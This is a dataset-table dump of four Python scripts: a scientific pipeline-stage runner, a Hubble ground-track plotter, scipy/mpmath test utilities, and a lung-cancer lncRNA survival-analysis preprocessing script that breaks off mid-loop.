gt stringclasses 1 value | context stringlengths 2.49k 119k |
|---|---|
#!/usr/bin/env python
from __future__ import print_function
__version__ = '0.1.8'
import argparse
import errno
import os
import platform
import shutil
import stat
import subprocess
import sys
from collections import OrderedDict
from datetime import datetime
from pathlib import Path
# Populated in __main__
STAGES = {}
class StageError(Exception):
pass
class Tee(object):
"""Contect manager that duplicates stdout and stderr to a file
"""
# http://stackoverflow.com/a/616686/1773758
def __init__(self, path):
self.file = path.open('w', encoding='utf8')
self.stdout, sys.stdout = sys.stdout, self
self.stderr, sys.stderr = sys.stderr, self
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
sys.stdout, sys.stderr = self.stdout, self.stderr
self.file.close()
def write(self, data):
# Flush to ensure that data are written to disk
self.file.write(data)
self.file.flush()
self.stdout.write(data)
self.stdout.flush()
class Stage(object):
"""A stage in a pipeline
"""
def __init__(self, stage):
if stage not in STAGES:
raise StageError('Stage [{0}] not recognised'.format(stage))
else:
self.stage = stage
p = Path(STAGES[stage][-1])
self.output_dir = p.parent / p.stem
def _prime(self):
"Creates self.output_dir. An error is raised if it already exists"
if self.output_dir.is_dir():
msg = ('Output directory [{0}] already exists. Has this stage '
'already been run?')
raise StageError(msg.format(self.output_dir))
else:
self.output_dir.mkdir()
return Tee(self.output_dir / 'log.txt')
def _time_string(self):
return datetime.now().strftime('%Y-%m-%dT%H:%M:%S%Z')
def _finished(self):
"Makes output files read only"
for p in (p for p in self.output_dir.rglob('*') if p.is_file()):
mode = stat.S_IMODE(p.stat().st_mode)
p.chmod(mode & ~(stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH))
def _cmd(self, args):
"Runs args and waits for it to finish, printing stdout"
s = subprocess.Popen(args, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
while True:
line = s.stdout.readline()
exitcode = s.poll()
line = line[:-1]
if not line and exitcode is not None:
break
elif line:
print(line.decode(errors='replace'))
if exitcode:
sys.exit(exitcode)
def run(self):
"Runs this stage"
with self._prime():
print('Stage [{0}] started at [{1}]'.format(self.stage,
self._time_string()))
print('Running somerset [{0}] in Python [{1}] on [{2}] [{3}]'.format(
__version__, sys.version, platform.node(), platform.platform()))
args = STAGES[self.stage]
if args[0].lower().endswith(('java', 'java.exe')):
# Sigh...
self._cmd( [args[0], '-version'] )
else:
self._cmd( [args[0], '--version'] )
self._cmd(args)
print('Stage [{0}] finished at [{1}]'.format(self.stage,
self._time_string()))
self._finished()
def run_all():
"Runs all stages"
if not STAGES:
raise StageError('No stages defined')
else:
print('Running all stages')
for s in STAGES.keys():
Stage(s).run()
print('All stages completed')
def remove_all_output():
"Removed all stage output directories"
if not STAGES:
raise StageError('No stages defined')
else:
print('Removing all output directories')
for s in STAGES.keys():
output_dir = Stage(s).output_dir
if output_dir.is_dir():
print('Removing [{0}]'.format(output_dir))
rmtree_readonly(output_dir)
print('All output directories removed')
def rmtree_readonly(path):
"""Like shutil.rmtree() but removes read-only files on Windows
"""
# http://stackoverflow.com/a/9735134
def handle_remove_readonly(func, path, exc):
excvalue = exc[1]
if func in (os.rmdir, os.remove) and excvalue.errno == errno.EACCES:
# ensure parent directory is writeable too
pardir = os.path.abspath(os.path.join(path, os.path.pardir))
if not os.access(pardir, os.W_OK):
os.chmod(pardir, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
os.chmod(path, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO) # 0777
func(path)
else:
raise
shutil.rmtree(str(path), ignore_errors=False, onerror=handle_remove_readonly)
def main():
sys.path.append(os.getcwd()) # For Windows
try:
import stages
except ImportError as e:
print('Unable to import stages.py: {0}'.format(e))
else:
global STAGES
STAGES = OrderedDict((stage, args) for stage, *args in stages.STAGES)
parser = argparse.ArgumentParser(description='Simple scientific pipelines')
parser.add_argument("stage", help='The stages to run. Can be names of stages'
'or a range e.g., 1-3', nargs='*')
parser.add_argument('-v', '--version', action='version',
version='%(prog)s ' + __version__)
parser.add_argument("-l", '--list-stages', action='store_true',
help='List all stages')
group_r = parser.add_mutually_exclusive_group()
group_r.add_argument('-r', '--remove-all-output', action='store_true',
help='Remove all stage output directories')
group_r.add_argument('-R', '--REMOVE-ALL-OUTPUT', action='store_true',
help='Same as -r but does not prompt before removing')
args = parser.parse_args()
if args.list_stages:
for key, command_line in STAGES.items():
print(key, command_line)
print('all')
elif args.remove_all_output or args.REMOVE_ALL_OUTPUT:
if args.remove_all_output:
res = input('Are you sure you want to remove all output directories '
'(y/N)?')
if args.REMOVE_ALL_OUTPUT or 'y'==res.lower():
remove_all_output()
else:
print('No action taken')
elif 1 == len(args.stage) and 'all' == args.stage[0].lower():
run_all()
elif args.stage:
stages = None
if (1 == len(args.stage) and '-' in args.stage[0] and
args.stage[0] not in STAGES):
# A range should be two stages seperated by a hyphen
lower, upper, *junk = args.stage[0].split('-')
if lower in STAGES and upper in STAGES and not junk:
keys = list(STAGES.keys())
stages = keys[keys.index(lower):(1 + keys.index(upper))]
if not stages:
# A range was not given - expect one or more stages seperated by
# spaces
stages = args.stage
for stage in stages:
Stage(stage).run()
else:
parser.print_help()
if __name__=='__main__':
main()
| |
# This tool will plot the HST ground tracks
from mpl_toolkits.basemap import Basemap
from pylab import *
from matplotlib.font_manager import FontProperties
import sys, glob, os.path
import string, math
import ephem
import time_util
import spst_getopt
def get_tle_file(request_time, tle_files):
"""This function will find the appropriate hst tle file
for the input request_time.
"""
import time_util
tle_keys = tle_files.keys()
tle_keys.sort()
sm4_time = time_util.spss_time("2009.139:00:00:00")
time_of_interest = time_util.spss_time(request_time)
if (time_of_interest < sm4_time):
min_index = 0
max_index = tle_keys.index("2010.055:00:00:00")
else:
min_index = tle_keys.index("2010.055:00:00:00")
max_index = len(tle_keys)
# end if
tle_file = tle_files[tle_keys[min_index]][0]
for i in tle_keys[min_index:max_index]:
if (time_of_interest >= tle_files[i][1]):
tle_file = tle_files[i][0]
# end if
# end for i
return tle_file
# end def get_tle_file
saa_switch_time = time_util.spss_time('2010.151:00:00:00')
# Deal with the input parameters
# 1st parm should be the start time for the HST ground track
# 2nd parm should be the end time for the HST ground track
# Both are required and in YYYY.JJJ:HH:MM:SS format
# Optional switch to label the HST ground track with HH:MM
labelhst = 0
allowed_options = ['labelhst']
options, parms = spst_getopt.spst_getopt(tuple(sys.argv[1:]), allowed_options)
if (options.has_key('-labelhst')):
labelhst = 1
# end if
arg1 = time_util.spss_time(parms[0])
arg2 = time_util.spss_time(parms[1])
# Note: The +1s is necessary due to the ephem.Date losing 1s somewhere
targ1 = arg1 + 1
targ2 = arg2 + 1
hst_start = ephem.Date(targ1.strftime("%Y/%m/%d %H:%M:%S"))
hst_stop = ephem.Date(targ2.strftime("%Y/%m/%d %H:%M:%S"))
num_points = int((hst_stop - hst_start)/ephem.minute)
# Get all the Two-Line ephemeris files
#name_list = glob.glob('/Users/niemi/Desktop/Misc/*.tle')
#tle_files = {}
#for tle in name_list:
# temp_base = string.split(os.path.splitext(os.path.split(tle)[1])[0],"_")
# print temp_base
# if (len(temp_base) != 2):
# continue
# end if
# ephem_date_string = "20" + temp_base[1][0:2] + "." + temp_base[1][2:] + ":00:00:00"
# tle_files[ephem_date_string] = [tle,time_util.spss_time(ephem_date_string)]
# end for tle
# Read in the HST Two-Line ephemeris
#SMN suggestions
import urllib2
hand = urllib2.urlopen('http://celestrak.com/NORAD/elements/science.txt')
data = hand.readlines()
hand.close()
HST = [[data[val], data[val+1], data[val+2]] for val, line in enumerate(data) if 'HST' in line]
hst = ephem.readtle(string.strip(HST[0][0]), string.strip(HST[0][1]), string.strip(HST[0][2]))
# Read in the HST Two-Line ephemeris
#hst_tle = get_tle_file(arg1, tle_files)
#temp = open(hst_tle,"r").readlines()
#hst = ephem.readtle(string.strip(temp[0]), \
# string.strip(temp[1]), \
# string.strip(temp[2]))
cur_time = hst_start
hst_longs = []
hst_lats = []
hst_text = []
for i in range(0,num_points):
#print ephem.date(cur_time)
hst.compute(cur_time)
hst_longs.append(hst.sublong.znorm*180.0/math.pi)
hst_lats.append(hst.sublat*180.0/math.pi)
ctime_text = "%02.2i:%02.2i" % (ephem.Date(cur_time).tuple()[3],ephem.Date(cur_time).tuple()[4])
hst_text.append(ctime_text)
cur_time = cur_time + ephem.minute
# end for i
#print "hst_longs = ", hst_longs
#print "hst_lats = ", hst_lats
#print "hst_text = ", hst_text
lon_0 = 330
lat_0 = -20
llcrnrlat = -60
llcrnrlon = -100
urcrnrlat = 20
urcrnrlon = 60
# use these values to setup Basemap instance.
width = 14000000
height = 10000000
#m = Basemap(width=width,height=height,\
# resolution='c',projection='aeqd',\
# lat_0=lat_0,lon_0=lon_0)
#m = Basemap(resolution='c',projection='aeqd',lat_0=lat_0,lon_0=lon_0)
#m = Basemap(width=width,height=height,\
# resolution='c',projection='aea',\
# lat_0=lat_0,lon_0=lon_0)
m = Basemap(resolution='c',projection='mbtfpq',lon_0=lon_0)
#m = Basemap(resolution='c',projection='moll',lon_0=lon_0)
#m = Basemap(resolution='c',projection='ortho',lon_0=lon_0,lat_0=lat_0)
#m = Basemap(resolution='c',projection='cyl',llcrnrlat=llcrnrlat,llcrnrlon=llcrnrlon,urcrnrlat=urcrnrlat,urcrnrlon=urcrnrlon)
p = FontProperties()
font1 = p.copy()
font1.set_size('small')
# draw coasts and fill continents.
m.drawcoastlines(linewidth=0.5)
#m.fillcontinents()
m.drawparallels(arange(-80,81,10),labels=[1,1,0,0],fontproperties=font1,labelstyle="+/-")
m.drawmeridians(arange(-180,180,20),labels=[0,0,0,1],fontproperties=font1,labelstyle="+/-")
m.drawmapboundary()
m.bluemarble()
m.drawmapboundary()
if (arg1 < saa_switch_time):
# Use the previous definitions
# SAA 02
x2,y2 = m([357.4-360,357.6-360,356.9-360,355.0-360,352.3-360,348.7-360,342.9-360,336.4-360,324.8-360,303.2-360,292.1-360,289.0-360,285.9-360,283.5-360,282.5-360,282.4-360,282.7-360,357.4-360], \
[-28.3,-26.1,-23.7,-21.2,-18.8,-16.3,-13.0,-10.6, -9.1,-11.9,-14.9,-17.0,-19.1,-21.3,-23.7,-26.0,-28.6,-28.3])
# SAA 05,23
x5,y5 = m([300.0-360, 45.0, 40.0, 30.0, 15.0, 0.0,341.0-360,318.0-360,300.0-360,283.0-360,273.0-360,275.0-360,300.0-360], \
[-50.0,-30.0,-25.0,-21.0,-15.0,-10.2, -2.0, 1.0, -3.0, -8.0,-20.0,-30.0,-50.0])
# SAA 24,25,28,31,32
x24,y24=m([ 20.0, 21.0, 19.0, 7.5,347.0-360,336.4-360,324.8-360,303.2-360,292.1-360,285.9-360,283.5-360,282.5-360,282.4-360,282.7-360, 20.0], \
[-28.3,-27.5,-26.1,-19.8, -9.6, -7.6, -6.0, -7.9,-12.0,-17.1,-20.3,-23.5,-26.0,-28.6,-28.3])
# SAA 26,27,29,30
x26,y26=m([ 25.0, 7.0,351.0-360,341.0-360,318.0-360,300.0-360,290.0-360,284.0-360,278.0-360,273.0-360,275.0-360, 25.0], \
[-28.5,-16.0, -6.5, -2.0, 1.0, -3.0, -7.0,-10.0,-15.0,-20.0,-30.0,-28.5])
else:
# Use the current definitions
# SAA 02
#x2,y2 = m([357.4-360,357.6-360,356.9-360,355.0-360,352.3-360,348.7-360,342.9-360,336.4-360,324.8-360,297.2-360,286.1-360,283.0-360,279.9-360,277.5-360,276.5-360,276.4-360,276.7-360,357.4-360], \
# [-28.3, -26.1, -23.7, -21.2, -18.8, -16.3, -13.0, -10.6, -9.1, -11.9, -14.9, -17.0, -19.1, -21.3, -23.7, -26.0, -28.6, -28.3])
x2,y2 = m([ 2.0, 1.0,358.0-360,353.0-360,347.0-360,340.0-360,331.4-360,318.8-360,308.0-360,297.2-360,286.1-360,283.0-360,279.9-360,277.5-360,276.5-360,276.4-360,276.7-360, 2.0], \
[-29.0,-26.1,-23.0, -19.3, -15.6, -12.0, -9.9, -9.1, -10.0, -11.9, -14.9, -17.0, -19.1, -21.3, -23.7, -26.0, -28.6, -29.0])
# SAA 05,23
x5,y5 = m([294.0-360, 39.0, 34.0, 24.0, 9.0,354.0-360,335.0-360,312.0-360,294.0-360,277.0-360,267.0-360,269.0-360,294.0-360], \
[-50.0,-30.0,-25.0,-21.0,-15.0,-10.2, -2.0, 1.0, -3.0, -8.0,-20.0,-30.0,-50.0])
# SAA 24,25,28,31,32
x24,y24=m([ 14.0, 15.0, 13.0, 1.5,341.0-360,330.4-360,318.8-360,297.2-360,286.1-360,279.9-360,277.5-360,276.5-360,276.4-360,276.7-360, 14.0], \
[-28.3,-27.5,-26.1,-19.8, -9.6, -7.6, -6.0, -7.9,-12.0,-17.1,-20.3,-23.5,-26.0,-28.6,-28.3])
# SAA 27,29,30
x26,y26=m([ 19.0, 1.0,345.0-360,335.0-360,312.0-360,294.0-360,284.0-360,278.0-360,272.0-360,267.0-360,269.0-360, 19.0], \
[-28.5,-16.0, -6.5, -2.0, 1.0, -3.0, -7.0,-10.0,-15.0,-20.0,-30.0,-28.5])
# end if
# HST observation ground track
xhst,yhst = m(hst_longs, hst_lats)
saa02 = m.plot(x2,y2,marker='D',markersize=4.0,markeredgewidth=0.0,color='black',linestyle='-',label='02')
saa05 = m.plot(x5,y5,marker='s',markersize=4.0,markeredgewidth=0.0,color='blue',linestyle='-',label='05')
saa24 = m.plot(x24,y24,marker='x',markersize=4.0,markeredgewidth=1.0,color='green',linestyle='-',label='24')
saa26 = m.plot(x26,y26,marker='^',markersize=4.0,markeredgewidth=0.0,color='maroon',linestyle='-',label='26')
hst = m.plot(xhst,yhst,marker='+',markersize=4.0,markeredgewidth=0.5,color='red',linestyle='-',linewidth=0.3,label='hst')
hst_label = 'HST once per minute'
if (labelhst):
hst_label = hst_label + ' (HH:MM)'
for j in range(0, num_points):
text(xhst[j],yhst[j],hst_text[j],fontsize=4,clip_on=True,horizontalalignment='left',verticalalignment='bottom')
font = p.copy()
font.set_size('xx-small')
legend((saa02,saa05,saa24,saa26,hst), \
('02 - FGS Guidance/STIS LV', \
'05/23 - Astrometry/NICMOS', \
'24/25/31/32 - STIS CCD/STIS MAMA/COS FUV/COS NUV', \
'27/28/29/30 - ACS CCD/ACS SBC/WFC3 UVIS/WFC3 IR', \
hst_label), \
prop=font,numpoints=2,borderpad=0.3,loc='upper center',borderaxespad=0.0,ncol=2)
#figlegend((saa02,saa05,saa24,saa26),('02','05','24','26'),'upper right')
# draw the title.
title('HST from %s to %s' % (str(arg1),str(arg2)))
show()
| |
from __future__ import division, print_function, absolute_import
import sys
import time
import numpy as np
from numpy.testing import dec, assert_
from scipy._lib.six import reraise
from scipy.special._testutils import assert_func_equal
try:
import mpmath
except ImportError:
try:
import sympy.mpmath as mpmath
except ImportError:
pass
# ------------------------------------------------------------------------------
# Machinery for systematic tests with mpmath
# ------------------------------------------------------------------------------
class Arg(object):
"""
Generate a set of numbers on the real axis, concentrating on
'interesting' regions and covering all orders of magnitude.
"""
def __init__(self, a=-np.inf, b=np.inf, inclusive_a=True, inclusive_b=True):
self.a = a
self.b = b
self.inclusive_a = inclusive_a
self.inclusive_b = inclusive_b
if self.a == -np.inf:
self.a = -np.finfo(float).max/2
if self.b == np.inf:
self.b = np.finfo(float).max/2
def values(self, n):
"""Return an array containing approximatively `n` numbers."""
n1 = max(2, int(0.3*n))
n2 = max(2, int(0.2*n))
n3 = max(8, n - n1 - n2)
v1 = np.linspace(-1, 1, n1)
v2 = np.r_[np.linspace(-10, 10, max(0, n2-4)),
-9, -5.5, 5.5, 9]
if self.a >= 0 and self.b > 0:
v3 = np.r_[
np.logspace(-30, -1, 2 + n3//4),
np.logspace(5, np.log10(self.b), 1 + n3//4),
]
v4 = np.logspace(1, 5, 1 + n3//2)
elif self.a < 0 < self.b:
v3 = np.r_[
np.logspace(-30, -1, 2 + n3//8),
np.logspace(5, np.log10(self.b), 1 + n3//8),
-np.logspace(-30, -1, 2 + n3//8),
-np.logspace(5, np.log10(-self.a), 1 + n3//8)
]
v4 = np.r_[
np.logspace(1, 5, 1 + n3//4),
-np.logspace(1, 5, 1 + n3//4)
]
elif self.b < 0:
v3 = np.r_[
-np.logspace(-30, -1, 2 + n3//4),
-np.logspace(5, np.log10(-self.b), 1 + n3//4),
]
v4 = -np.logspace(1, 5, 1 + n3//2)
else:
v3 = []
v4 = []
v = np.r_[v1, v2, v3, v4, 0]
if self.inclusive_a:
v = v[v >= self.a]
else:
v = v[v > self.a]
if self.inclusive_b:
v = v[v <= self.b]
else:
v = v[v < self.b]
return np.unique(v)
class FixedArg(object):
def __init__(self, values):
self._values = np.asarray(values)
def values(self, n):
return self._values
class ComplexArg(object):
def __init__(self, a=complex(-np.inf, -np.inf), b=complex(np.inf, np.inf)):
self.real = Arg(a.real, b.real)
self.imag = Arg(a.imag, b.imag)
def values(self, n):
m = max(2, int(np.sqrt(n)))
x = self.real.values(m)
y = self.imag.values(m)
return (x[:,None] + 1j*y[None,:]).ravel()
class IntArg(object):
def __init__(self, a=-1000, b=1000):
self.a = a
self.b = b
def values(self, n):
v1 = Arg(self.a, self.b).values(max(1 + n//2, n-5)).astype(int)
v2 = np.arange(-5, 5)
v = np.unique(np.r_[v1, v2])
v = v[(v >= self.a) & (v < self.b)]
return v
class MpmathData(object):
def __init__(self, scipy_func, mpmath_func, arg_spec, name=None,
dps=None, prec=None, n=5000, rtol=1e-7, atol=1e-300,
ignore_inf_sign=False, distinguish_nan_and_inf=True,
nan_ok=True, param_filter=None):
self.scipy_func = scipy_func
self.mpmath_func = mpmath_func
self.arg_spec = arg_spec
self.dps = dps
self.prec = prec
self.n = n
self.rtol = rtol
self.atol = atol
self.ignore_inf_sign = ignore_inf_sign
self.nan_ok = nan_ok
if isinstance(self.arg_spec, np.ndarray):
self.is_complex = np.issubdtype(self.arg_spec.dtype, np.complexfloating)
else:
self.is_complex = any([isinstance(arg, ComplexArg) for arg in self.arg_spec])
self.ignore_inf_sign = ignore_inf_sign
self.distinguish_nan_and_inf = distinguish_nan_and_inf
if not name or name == '<lambda>':
name = getattr(scipy_func, '__name__', None)
if not name or name == '<lambda>':
name = getattr(mpmath_func, '__name__', None)
self.name = name
self.param_filter = param_filter
def check(self):
np.random.seed(1234)
# Generate values for the arguments
if isinstance(self.arg_spec, np.ndarray):
argarr = self.arg_spec.copy()
else:
num_args = len(self.arg_spec)
ms = np.asarray([1.5 if isinstance(arg, ComplexArg) else 1.0
for arg in self.arg_spec])
ms = (self.n**(ms/sum(ms))).astype(int) + 1
argvals = []
for arg, m in zip(self.arg_spec, ms):
argvals.append(arg.values(m))
argarr = np.array(np.broadcast_arrays(*np.ix_(*argvals))).reshape(num_args, -1).T
# Check
old_dps, old_prec = mpmath.mp.dps, mpmath.mp.prec
try:
if self.dps is not None:
dps_list = [self.dps]
else:
dps_list = [20]
if self.prec is not None:
mpmath.mp.prec = self.prec
# Proper casting of mpmath input and output types. Using
# native mpmath types as inputs gives improved precision
# in some cases.
if np.issubdtype(argarr.dtype, np.complexfloating):
pytype = mpc2complex
def mptype(x):
return mpmath.mpc(complex(x))
else:
def mptype(x):
return mpmath.mpf(float(x))
def pytype(x):
if abs(x.imag) > 1e-16*(1 + abs(x.real)):
return np.nan
else:
return mpf2float(x.real)
# Try out different dps until one (or none) works
for j, dps in enumerate(dps_list):
mpmath.mp.dps = dps
try:
assert_func_equal(self.scipy_func,
lambda *a: pytype(self.mpmath_func(*map(mptype, a))),
argarr,
vectorized=False,
rtol=self.rtol, atol=self.atol,
ignore_inf_sign=self.ignore_inf_sign,
distinguish_nan_and_inf=self.distinguish_nan_and_inf,
nan_ok=self.nan_ok,
param_filter=self.param_filter)
break
except AssertionError:
if j >= len(dps_list)-1:
reraise(*sys.exc_info())
finally:
mpmath.mp.dps, mpmath.mp.prec = old_dps, old_prec
def __repr__(self):
if self.is_complex:
return "<MpmathData: %s (complex)>" % (self.name,)
else:
return "<MpmathData: %s>" % (self.name,)
def assert_mpmath_equal(*a, **kw):
d = MpmathData(*a, **kw)
d.check()
def nonfunctional_tooslow(func):
return dec.skipif(True, " Test not yet functional (too slow), needs more work.")(func)
# ------------------------------------------------------------------------------
# Tools for dealing with mpmath quirks
# ------------------------------------------------------------------------------
def mpf2float(x):
"""
Convert an mpf to the nearest floating point number. Just using
float directly doesn't work because of results like this:
with mp.workdps(50):
float(mpf("0.99999999999999999")) = 0.9999999999999999
"""
return float(mpmath.nstr(x, 17, min_fixed=0, max_fixed=0))
def mpc2complex(x):
return complex(mpf2float(x.real), mpf2float(x.imag))
def trace_args(func):
def tofloat(x):
if isinstance(x, mpmath.mpc):
return complex(x)
else:
return float(x)
def wrap(*a, **kw):
sys.stderr.write("%r: " % (tuple(map(tofloat, a)),))
sys.stderr.flush()
try:
r = func(*a, **kw)
sys.stderr.write("-> %r" % r)
finally:
sys.stderr.write("\n")
sys.stderr.flush()
return r
return wrap
try:
import posix
import signal
POSIX = ('setitimer' in dir(signal))
except ImportError:
POSIX = False
class TimeoutError(Exception):
pass
def time_limited(timeout=0.5, return_val=np.nan, use_sigalrm=True):
"""
Decorator for setting a timeout for pure-Python functions.
If the function does not return within `timeout` seconds, the
value `return_val` is returned instead.
On POSIX this uses SIGALRM by default. On non-POSIX, settrace is
used. Do not use this with threads: the SIGALRM implementation
does probably not work well. The settrace implementation only
traces the current thread.
The settrace implementation slows down execution speed. Slowdown
by a factor around 10 is probably typical.
"""
if POSIX and use_sigalrm:
def sigalrm_handler(signum, frame):
raise TimeoutError()
def deco(func):
def wrap(*a, **kw):
old_handler = signal.signal(signal.SIGALRM, sigalrm_handler)
signal.setitimer(signal.ITIMER_REAL, timeout)
try:
return func(*a, **kw)
except TimeoutError:
return return_val
finally:
signal.setitimer(signal.ITIMER_REAL, 0)
signal.signal(signal.SIGALRM, old_handler)
return wrap
else:
def deco(func):
def wrap(*a, **kw):
start_time = time.time()
def trace(frame, event, arg):
if time.time() - start_time > timeout:
raise TimeoutError()
return None # turn off tracing except at function calls
sys.settrace(trace)
try:
return func(*a, **kw)
except TimeoutError:
sys.settrace(None)
return return_val
finally:
sys.settrace(None)
return wrap
return deco
def exception_to_nan(func):
"""Decorate function to return nan if it raises an exception"""
def wrap(*a, **kw):
try:
return func(*a, **kw)
except Exception:
return np.nan
return wrap
def inf_to_nan(func):
"""Decorate function to return nan if it returns inf"""
def wrap(*a, **kw):
v = func(*a, **kw)
if not np.isfinite(v):
return np.nan
return v
return wrap
def mp_assert_allclose(res, std, atol=0, rtol=1e-17):
"""
Compare lists of mpmath.mpf's or mpmath.mpc's directly so that it
can be done to higher precision than double.
"""
try:
len(res)
except TypeError:
res = list(res)
n = len(std)
if len(res) != n:
raise AssertionError("Lengths of inputs not equal.")
failures = []
for k in range(n):
try:
assert_(mpmath.fabs(res[k] - std[k]) <= atol + rtol*mpmath.fabs(std[k]))
except AssertionError:
failures.append(k)
ndigits = int(abs(np.log10(rtol)))
msg = [""]
msg.append("Bad results ({} out of {}) for the following points:"
.format(len(failures), n))
for k in failures:
resrep = mpmath.nstr(res[k], ndigits, min_fixed=0, max_fixed=0)
stdrep = mpmath.nstr(std[k], ndigits, min_fixed=0, max_fixed=0)
if std[k] == 0:
rdiff = "inf"
else:
rdiff = mpmath.fabs((res[k] - std[k])/std[k])
rdiff = mpmath.nstr(rdiff, 3)
msg.append("{}: {} != {} (rdiff {})".format(k, resrep, stdrep, rdiff))
if failures:
assert_(False, "\n".join(msg))
| |
## A script for finding every cox coefficient and pvalue for every LUSC lncRNA in the beta MiTranscriptome data set (normalized counts)
## Load necessary modules
from rpy2 import robjects as ro
import numpy as np
import os
ro.r('library(survival)')
import re
##This call will only work if you are running python from the command line.
##If you are not running from the command line manually type in your paths.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))
f=open(os.path.join(BASE_DIR,'tcga_data','LUSC','clinical','nationwidechildrens.org_clinical_follow_up_v1.0_lusc.txt'))
##get the column indexes needed
columns=f.readline().strip().split('\t')
patient_column=columns.index('bcr_patient_barcode')
alive_column=columns.index('last_contact_days_to')
death_column=columns.index('death_days_to')
f.readline()
f.readline()
data=[i.split('\t') for i in f]
## A patient can be listed multiple times in the file. The most recent listing (furthest down in the file), contains the most recent
## follow up data. This code checks if the patient has already been loaded into the list, and if so, takes the more recent data.
## This required an empty value in the list initialization.
## Data is: [[Patient ID, time(days), Vital status],[Patient ID, time(days), Vital status],...]
clinical1=[['','','']]
for i in data:
if clinical1[-1][0]==i[patient_column]:
if re.search('^[0-9]+$',i[death_column]):
clinical1[-1]=[i[patient_column],int(i[death_column]),'Dead']
elif re.search('^[0-9]+$',i[alive_column]):
clinical1[-1]=[i[patient_column],int(i[alive_column]),'Alive']
else:
pass
else:
if re.search('^[0-9]+$',i[death_column]):
clinical1.append([i[patient_column],int(i[death_column]),'Dead'])
elif re.search('^[0-9]+$',i[alive_column]):
clinical1.append([i[patient_column],int(i[alive_column]),'Alive'])
else:
pass
## Removing the empty value.
clinical=clinical1[1:]
## Sex and age information were taken from the "clinical_patient" file. A dictionary was created for sex.
more_clinical={}
sex_dict={}
sex_dict['MALE']=0
sex_dict['FEMALE']=1
## The "clinical_patient" file can also contain patients not listed in the follow_up files.
## In these cases the clinical data for these patients gets appended to a new clinical list.
f=open(os.path.join(BASE_DIR,'tcga_data','LUSC','clinical','nationwidechildrens.org_clinical_patient_lusc.txt'))
##get the column indexes needed
columns=f.readline().split('\t')
sex_column=columns.index('gender')
age_column=columns.index('age_at_initial_pathologic_diagnosis')
patient_column=columns.index('bcr_patient_barcode')
alive_column=columns.index('last_contact_days_to')
death_column=columns.index('death_days_to')
f.readline()
f.readline()
clinical4=[]
data=[i.split('\t') for i in f]
for i in data:
try:
more_clinical[i[patient_column]]=[0,sex_dict[i[sex_column]],int(i[age_column])]
if re.search('^[0-9]+$',i[death_column]):
clinical4.append([i[patient_column],int(i[death_column]),'Dead'])
elif re.search('^[0-9]+$',i[alive_column]):
clinical4.append([i[patient_column],int(i[alive_column]),'Alive'])
else:
pass
except:
pass
new_clinical=[]
##It is possible that the clinical data in the clinical_patient file is more up to date than the follow_up files
##All the clinical data is merged checking which data is the most up to date
for i in clinical4:
if i[0] not in [j[0] for j in clinical]:
new_clinical.append(i)
else:
if i[1]<=clinical[[j[0] for j in clinical].index(i[0])][1]:
new_clinical.append(clinical[[j[0] for j in clinical].index(i[0])])
else:
new_clinical.append(i)
##also do the reverse since clinical can contain patients not included in clinical4
for i in clinical:
if i[0] not in [j[0] for j in new_clinical]:
new_clinical.append(i)
## only patients who had a follow up time greater than 0 days are included in the analysis
clinical=[i for i in new_clinical if i[1]>0]
final_clinical=[]
## A new list containing both follow up times and sex and age is constructed.
## Only patients with sex and age information are included.
## Data is [[Patient ID, time (days), vital status, 0, sex, age at diagnosis],...]
for i in clinical:
if i[0] in more_clinical:
final_clinical.append(i+more_clinical[i[0]])
##In a separate script I parsed the mitranscriptome.expr.counts.tsv file and extracted the GBM patient and expression values.
##From this file I will load the expression data.
##There are duplicated transcripts and the possibility of a patient having multiple sequencing files.
##create a dictionary to check for duplicated data
lncrna_dict={}
##I have the list of transcripts saved in a file
f=open(os.path.join(BASE_DIR,'lncrna','transcripts.txt'))
transcripts=eval(f.read())
f=open(os.path.join(BASE_DIR,'tcga_data','LUSC','lncrna','LUSC.txt'))
##patient list is at the top of the file
patients=f.readline().strip().split()
lncrnas=[[]]*len(patients)
for i,j in zip(transcripts,f):
if i not in lncrna_dict:
data=eval(j.strip())
for index, k in enumerate(data):
lncrnas[index]=lncrnas[index]+[[i,float(k)]]
lncrna_dict[i]=''
##create a dictionary mapping patient to all of their lncrna expression data
patient_dict={}
for index, i in enumerate(patients):
patient_dict[i[:12]]=patient_dict.get(i[:12],[])+[lncrnas[index]]
##find which patients have complete clinical data, order the data, and average data if necessary
##it's possible there are expression data for patients without clinical data, and clinical data without expression data
##create a new clinical list called clinical_and_files for consistency with previous scripts
clinical_and_files=[]
for i in final_clinical:
if i[0] in patient_dict:
clinical_and_files.append(i)
ordered_lncrnas=[]
for i in clinical_and_files:
temp=[]
for j in patient_dict[i[0]]:
temp.append(j)
if len(temp)==1:
ordered_lncrnas.append(temp[0])
else:
values=[]
for k in temp:
values.append([kk[1] for kk in k])
ordered_lncrnas.append(zip([z[0] for z in temp[0]],list(sum([np.array(kkk) for kkk in values])/float(len(temp)))))
## Only want lncras that meet an expression cutoff
## It is not known what expression level of lncrnas is needed for function, so a soft value for median was chosen.
## I don't want to perform an analysis with all 0 expression however, so zeros are still counted.
## A cutoff of .1 and no more than a fourth of the patients containing no expression was chosen
final_lncrnas=[[]]*len(ordered_lncrnas)
for i in range(len(ordered_lncrnas[0])):
temp=[]
for j in ordered_lncrnas:
temp.append(j[i])
count=0
for k in temp:
if k[1]==0:
count+=1
median=np.median([ii[1] for ii in temp])
if count<len(ordered_lncrnas)/4.0 and median>.1:
for index, kk in enumerate(temp):
final_lncrnas[index]=final_lncrnas[index]+[kk]
## This will write the final lncrnas to a medium sized file ~10-50MB which could be useful for further analyses, this step can be skipped.
f=open(os.path.join(BASE_DIR,'lncrna','cox','LUSC','final_lncrnas.txt'),'w')
for i in final_lncrnas:
f.write(str(i))
f.write('\n')
f.close()
##Performing Cox regression on all of the lncrnas in final_lncrnas
death_dic={}
death_dic['Alive']=0
death_dic['Dead']=1
coeffs=[]
pvalues=[]
lncrnas=[] ##This list tracks the lncrna names
for i in range(len(final_lncrnas[0])):
kaplan=[]
lncrnas.append(final_lncrnas[0][i][0])
for k,j in zip(clinical_and_files,final_lncrnas): ## These lists contain the clinical information and lncrna data in the same order.
kaplan.append([k[1],k[2],k[3],k[4],k[5],j[i][1]])
